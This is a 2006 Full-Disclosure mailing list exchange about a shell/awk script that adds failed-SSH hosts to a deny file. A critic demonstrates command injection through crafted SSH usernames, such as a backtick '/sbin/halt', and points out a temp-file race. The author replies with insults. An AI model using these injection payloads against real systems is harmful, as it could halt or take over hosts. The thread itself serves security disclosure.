Tavis Ormandy wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.
Here's an exploit.
#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim
Since you seem to be clueless I'll answer step by step. Here goes idiot.
(Sinful to see someone so clueless coming from Gentoo... Guess it goes
with the romper room Linux territory)
/////
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >>
/tmp/hosts.deny
insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.
$ ssh "error retrieving"@localhost & ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`
Oops.
Thanks, Tavis.
So again dumbass...
Look at the script. Although YOU'RE opening /var/log/authlog what is the
script opening. Please tell me you're really not that stupid. And if
someone else decided to modify this script, what does that have to do
with what I posted. How exactly is my script a backdoor as you claim.
Enquiring minds want to know this since you claim its a backdoor. Please
tell me outside of your modification how this is going to backdoor someone.
--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
